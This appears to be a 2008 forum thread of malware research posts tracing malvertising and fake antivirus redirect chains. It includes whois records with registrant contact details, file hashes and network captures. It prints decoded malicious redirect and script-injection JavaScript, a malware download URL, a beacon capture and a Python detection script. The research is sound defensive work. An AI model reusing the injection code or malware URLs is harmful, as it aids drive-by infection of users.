The content of a.js reveals the next location ... aqtravel.info/find/search.php?said=Mkey5&q=Aolmail
IPB Image
At aqtravel.info we stumble on a 302 which forwards us to the fake online scanner.
CODE
GET /find/search.php?said=Mkey5&q=Aolmail HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: aqtravel.info
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Tue, 29 Jul 2008 16:12:16 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
Location: http://scanning-computer-online.com/1/?xx=1&in=2&ag=2&end=1&g=1&affid=401&lid=103
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

163
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://scanning-computer-online.com/1/?xx=1&in=2&ag=2&end=1&g=1&affid=401&lid=103">here</A>.<P>
<HR>
<ADDRESS>Apache/1.3.39 Server at aqtravel.info Port 80</ADDRESS>
</BODY></HTML>
______________________________

chocolatgirl.50webs.com/description/lame-enc.html

The page contains an obfuscated javascript.
IPB Image
Once decoded we obtain a link to lineacount.info/cgi-bin/counter?id=133722&ref=
CODE
document.write('<sc'+'ript src="http://lineacount.info/cgi-bin/counter?id=133722&ref='+escape(document.referrer)+'"></sc'+'ript>')
At lineacount.info we again fall on an obfuscated script.
IPB Image
Decoded it leads to scan.wsp2008scanner.com/263/509/
CODE
document.write('<sc'+'ript> document.location="http://scan.wsp2008scanner.com/263/509/" </sc'+'ript>');
IPB Image
IPB Image
IPB Image
______________________________

gogele.com

gogele.com redirects to landing.trafficz.com/index.php?domain=gogele.com where we get an advertising popup upon entering the website. If you are unlucky, you will get redirected to some fake online scanner. Some examples are described here.
______________________________

bull.s11.x-beat.com/src/bull124569.gif

I'm redirected to an adult website at the time of the write-up. Exploits are possible on such websites.

aqtravel.info - 88.214.200.55


Website Title: None given.
Created: 2007-06-25
Expires: 2009-06-25
Updated: 2008-06-26
Whois Server: whois.afilias.info
IP Location - United Kingdom - Real International Business Corp

Domain ID:D18657023-LRMS
Domain Name:AQTRAVEL.INFO
Created On:25-Jun-2007 19:57:38 UTC
Last Updated On:26-Jun-2008 10:26:02 UTC
Expiration Date:25-Jun-2009 19:57:38 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:OK
Registrant ID:DI_6401114
Registrant Name:eric peeters
Registrant Organization:N/A
Registrant Street1:stationstraat 87
Registrant Street2:
Registrant Street3:
Registrant City:gent
Registrant State/Province:Oost-Vlaanderen(nl)
Registrant Postal Code:9030
Registrant Country:BE
Registrant Phone:+32.0484659841
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:DI_6401114
Admin Name:eric peeters
Admin Organization:N/A
Admin Street1:stationstraat 87
Admin Street2:
Admin Street3:
Admin City:gent
Admin State/Province:Oost-Vlaanderen(nl)
Admin Postal Code:9030
Admin Country:BE
Admin Phone:+32.0484659841
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Billing ID:DI_6401114
Billing Name:eric peeters
Billing Organization:N/A
Billing Street1:stationstraat 87
Billing Street2:
Billing Street3:
Billing City:gent
Billing State/Province:Oost-Vlaanderen(nl)
Billing Postal Code:9030
Billing Country:BE
Billing Phone:+32.0484659841
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:
Tech ID:DI_6401114
Tech Name:eric peeters
Tech Organization:N/A
Tech Street1:stationstraat 87
Tech Street2:
Tech Street3:
Tech City:gent
Tech State/Province:Oost-Vlaanderen(nl)
Tech Postal Code:9030
Tech Country:BE
Tech Phone:+32.0484659841
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:
Name Server:NS0.HQHOST.NET
Name Server:NS1.HQHOST.NET

Websites.

scanning-computer-online.com - 91.203.92.48


Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-04
Expires: 2009-07-04
Updated: 2008-07-04
Name Server: NS1.MYNICK.NAME (has 931 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com
IP Location - United Kingdom - Isp Uatelecom Llc

Domain Name: SCANNING-COMPUTER-ONLINE.COM

Creation Date: 04-Jul-2008
Expiration Date: 04-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764

Websites.

lineacount.info - 85.255.118.122


Website Title: None given.
Created: 2007-05-03
Expires: 2009-05-03
Updated: 2008-06-19
Whois Server: whois.afilias.info

Server Type: Apache/1.3.31 (Unix) mod_python/2.7.10 Python/2.2.2 mod_webapp/1.2.0-dev mod_perl/1.29 mod_throttle/3.1.2 PHP/4.3.8 FrontPage/5.0.2.2510 mod_ssl/2.8.18 OpenSSL/0.9.7d
IP Location - Ukraine - Ukrtelegroup Ltd

Domain ID:D17629058-LRMS
Domain Name:LINEACOUNT.INFO
Created On:03-May-2007 11:59:52 UTC
Last Updated On:19-Jun-2008 14:04:36 UTC
Expiration Date:03-May-2009 11:59:52 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:OK
Registrant ID:DI_6310930
Registrant Name:Byron Hadley
Registrant Organization:N/A
Registrant Street1:Hornindal
Registrant Street2:
Registrant Street3:
Registrant City:Hornindal
Registrant State/Province:Not Applicable
Registrant Postal Code:6763
Registrant Country:NO
Registrant Phone:+47.57879605
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Name Server:NS1.LINEACOUNT.INFO
Name Server:NS2.LINEACOUNT.INFO

Websites.

scan.wsp2008scanner.com - 85.255.119.146


Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-07-23
Expires: 2009-07-23
Updated: 2008-07-23
Name Server: NS1.EVERYDNS.NET (has 93,672 domains)
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Whois Server: whois.estdomains.com

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: www.estdomains.com

Domain Name: WSP2008SCANNER.COM

Registrant:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284

Creation Date: 23-Jul-2008
Expiration Date: 23-Jul-2009

Domain servers in listed order:
ns4.everydns.net
ns3.everydns.net
ns2.everydns.net
ns1.everydns.net

Kimberly

c-net 91.208.0


A couple of newcomers in the Still Trade Ltd block. See softtraf.com.

Myspace - antispywaremaster.com


Myspace.com is hit again by a malicious Flash banner. More info at FaceTime Security Labs.

The victims are redirected to antispywaremaster.com as seen on the screenshot. Antispywaremaster.com has been mentioned on several occasions by me & Sandi. Not long ago we saw a banner redirecting to them on screensavers.com. ForceUp behind it again? Sandi did mention them a couple of days ago on her blog.
Kimberly

91.208.0.233 - 91.208.0.254


A couple more from that same block.

Kimberly

global-advers.com


adtds.trackads.net / adtds2.promoplexer.com have activated a new domain: global-advers.com
global-advers.com/soft.php?aid=0639&d=3&product=XPA
Depending on the parameters, people get redirected to different fake online scanners. I got redirected to
windows-scannernv.com/2008/3/freescan.php?aid=880639
global-advers.com - 89.149.226.24

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-30
Expires: 2009-07-30
Updated: 2008-07-30
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 897 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k

Whois Record
Domain Name: GLOBAL-ADVERS.COM

Creation Date: 30-Jul-2008
Expiration Date: 30-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
______________________________

windows-scannernv.com - 89.149.226.24

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-22
Expires: 2009-07-22
Updated: 2008-07-22
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 897 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k

Whois Record
Domain Name: WINDOWS-SCANNERNV.COM

Creation Date: 22-Jul-2008
Expiration Date: 22-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Other Websites.

antivirus-2009pro.com A
antivirus-database.com A
antivirus2009professional.com A
securityscannersite.com A
spywareonlinescanner.com A
vps014.vserver4free.de PTR A
windows-internet-scanner.com A
windows-scannernv.com A
www.antivirus2009professional.com CNAME
Kimberly

Exploiting redirects in Flash content


*Sigh* ... another of those sneaky little Flash files (1,394 bytes). This time an executable is downloaded onto the PC from www.plgou.com.
Don't visit the site: different exploits are present, and you could encounter them on any website, as they are used in SQL injections. Apparently a user has been hit on my.yahoo, according to Sandi's blog. A Google search on "jjmaobuduo.3322.org/csrss/w.js" already reveals a high number of affected websites.
______________________________

Filename: i47.swf

File size: 1394 bytes
MD5...: b3a302976d5d76a6d28e210b22e535a6
SHA1..: 969935f8367fd738df12b10457897499af4a4b2a
SHA256: f06ff8eb3f3243a3ae0697c3943c8af82ccbbd1381a0c9aef2fdce615ac40b0d
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File i47.swf received on 08.07.2008 07:45:31
______________________________

rondll32.exe

File size: 29244 bytes
MD5...: 68ba2b52c10841ea3d3e5d0982f647d8
SHA1..: 1fadf7e63621f5c60246759a0392203451ec6fd7
SHA256: 4315e62ec430fcc7820b95dcbdd780f210e1b55f188d56281c309d08208dc702
PEiD..: -
QUOTE
File rondll32.exe received on 08.07.2008 07:46:26
ThreatExpert Report.
______________________________

plgou.com - 121.11.76.85

Domain Name: PLGOU.COM
Registrar: ENAME, INC
Whois Server: whois.ename.com
Referral URL: http://www.ename.com
Name Server: NS1.ENAME.CN
Name Server: NS2.ENAME.CN
Name Server: NS3.ENAME.CN
Name Server: NS4.ENAME.CN
Name Server: NS5.ENAME.CN
Name Server: NS6.ENAME.CN
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 10-mar-2008
Creation Date: 17-feb-2008
Expiration Date: 17-feb-2009
Kimberly

Nancy Drew - Circulating malvertisement


Nancy Drew Solves Mysteries In Style ... whoops ... maybe we should say Nancy Drew Hijacks In Style instead. And this time no redirect to a fake online scanner but an executable. The pest is nifty to remove btw as it belongs to the Vundo family.

Banner.
Redirect.
82.98.235.173/ex3/i.exe
______________________________

Filename: i.exe

File size: 34816 bytes
MD5...: 01511e9da4f526b2b44f772c62b2bedd
SHA1..: 6686169f7240c81bdbe888b3136771317907b657
SHA256: ee374db6872205044a8a8cb518d881b6d9553d10e333329cf8cb709291008102
PEiD..: -
QUOTE
File i.exe received on 08.08.2008 00:43:41
ThreatExpert Report.

Addendum to the ThreatExpert report.

Visible Signs.

O4 - HKCU\..\Run: [A00F25D34.exe] C:\DOCUME~1\KLY\LOCALS~1\Temp\_A00F25D34.exe
O20 - Winlogon Notify: __c005C86E - C:\WINDOWS\system32\__c005C86E.dat
When Internet Explorer is opened, __c005C86E.dat tries to download additional stuff from nx1.todaystats.com using a special User-Agent, but as seen in the network capture, we get a 404 error for the time being.
CODE
GET /?a=4011&t=[removed]/[removed]=&f=0 HTTP/1.1
User-Agent: MSIE
Host: nx1.todaystats.com
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Date: Fri, 08 Aug 2008 04:03:59 GMT
Connection: close
______________________________

82.98.235.173

Whois Record
inetnum: 82.98.235.0 - 82.98.235.255
netname: CYBERTECHNOLOGY
descr: Cyber Technology BV BA/SPRL
descr: Belgium
country: NL
admin-c: OVL3-RIPE
tech-c: OVL3-RIPE
status: ASSIGNED PA
remarks: *******************************************
remarks: * Abuse contact: *
remarks: *******************************************
mnt-by: ABOVENET-P
mnt-lower: ABOVENET-P
mnt-routes: ABOVENET-P
source: RIPE # Filtered

person: Oliver van Loven
address: Cyber Technology BVBA/SPRL
address: 164 rue emile dury
address: 1410 Waterloo Brussels
address: Belgium
e-mail:
phone: +32 2 479 87 16
fax-no: +32 2 479 87 16
mnt-by: ABOVENET-P
nic-hdl: OVL3-RIPE
source: RIPE # Filtered
______________________________

nx1.todaystats.com - 82.98.193.167 & 82.98.193.18
todaystats.com - 62.4.84.4
Kimberly

New malvertizement for E*Trade Financial


Courtesy of Sandi.

E*Trade Financial (etrade.com).
Campaign.
stathome.net/c/index.php?id=[removed]
profitabill.com/?cmpid=responsein&adid=intl
More info.
Kimberly

123greetings.com - BigHip


A new malvertizement is being served on 123greetings.com featuring BigHip Email Marketing Solutions. Fuse Kit 2.1.4 was used for this creative.

Screenshot in situ.
Banner.
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/Servedad_LB_11137A/big_hip_01_728x90.swf
Campaign.
openadstream.net/stat.gif?url=[removed]
At the time of the write-up the full redirect was inactive. Adopstools was not able to analyse the malicious banner.
Kimberly

Warning: forbes.com - BigHip


The BigHip malvertizement discovered less than 24h ago on 123greetings.com *might* eventually be displayed at forbes.com; everything depends, of course, on how long some advertisements are actively used. The malicious banner is present on their server as seen below.

Screenshot.
Banner.
images.forbes.com/ads/BigHip/New.swf
Campaign.
openadstream.net/stat.gif?url=[removed]
The redirect is identical to the one from 123greetings.com. At the time of the write-up the full redirect was inactive.

Flash banner properties.

According to wget, the Flash file has a date stamp of July 11, 2008. Until further notice I would recommend extreme caution when visiting forbes.com.
Network Trace.
CODE
GET http://openadstream.net/stat.gif?url=[removed] HTTP/1.1
Accept: */*
Referer: http://images.forbes.com/ads/BigHip/New.swf
x-flash-version: 9,0,47,0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla
______________________________

On a lighter note, the advertising campaign on 123greetings.com has been suspended earlier today. Ref.
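Both captures quoted in this thread (the __c005C86E.dat request to nx1.todaystats.com and the BigHip banner's stat.gif call) share traits a proxy-log check can key on: a bare one-word User-Agent instead of a browser string, and, for the Flash trace, an x-flash-version request whose Referer is an ad SWF on a different host from the destination. The Python below is an added example, not code from the post; the benign request is constructed for contrast.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# The two request captures quoted in this thread (the __c005C86E.dat beacon to
# nx1.todaystats.com and the BigHip banner's stat.gif call), used here as sample input.
CAPTURE_TODAYSTATS = """GET /?a=4011&t=[removed]/[removed]=&f=0 HTTP/1.1
User-Agent: MSIE
Host: nx1.todaystats.com
Cache-Control: no-cache
"""
CAPTURE_OPENADSTREAM = """GET http://openadstream.net/stat.gif?url=[removed] HTTP/1.1
Accept: */*
Referer: http://images.forbes.com/ads/BigHip/New.swf
x-flash-version: 9,0,47,0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla
"""
# Constructed benign request (not from the thread) so the checks have a negative case.
CAPTURE_BENIGN = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Referer: http://www.example.com/
"""


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: dict = field(default_factory=dict)  # header names lower-cased

    def header(self, name):
        return self.headers.get(name.lower())

    @property
    def host(self):
        # Proxy-style traces use an absolute URL as target and may omit Host.
        return (self.header("host") or urlsplit(self.target).hostname or "").lower()


def parse_request(raw):
    """Parse request line and headers of a raw capture; stop at the blank line before any response."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers)


# Browsers send a product token with a version ("Mozilla/5.0 (...)"); a single bare
# word such as "MSIE" or "Mozilla" is a hand-rolled HTTP client, as in both captures.
BARE_UA = re.compile(r"^[A-Za-z]+$")


def find_indicators(req):
    findings = []
    ua = req.header("user-agent") or ""
    if BARE_UA.match(ua):
        findings.append(f"bare user-agent '{ua}'")
    # x-flash-version marks a request issued by the Flash plugin; a Referer pointing at
    # an ad SWF on a host other than the destination means the banner is beaconing out.
    if req.header("x-flash-version"):
        ref_host = (urlsplit(req.header("referer") or "").hostname or "").lower()
        if ref_host and ref_host != req.host:
            findings.append(f"flash beacon from {ref_host} to third party {req.host}")
    return findings
```

Run `find_indicators(parse_request(raw))` over each request in a capture; the benign sample returns an empty list while both thread captures are flagged.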
Kimberly

Served Ad - www.servedad.net


A while back we saw that folder names in URLs can reveal interesting things, cf. ReachWe. When I looked at the URL leading to the BigHip advertisement, I knew I had already seen Servedad somewhere ...

BigHip.
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/Servedad_LB_11137A/big_hip_01_728x90.swf
Link.

Forex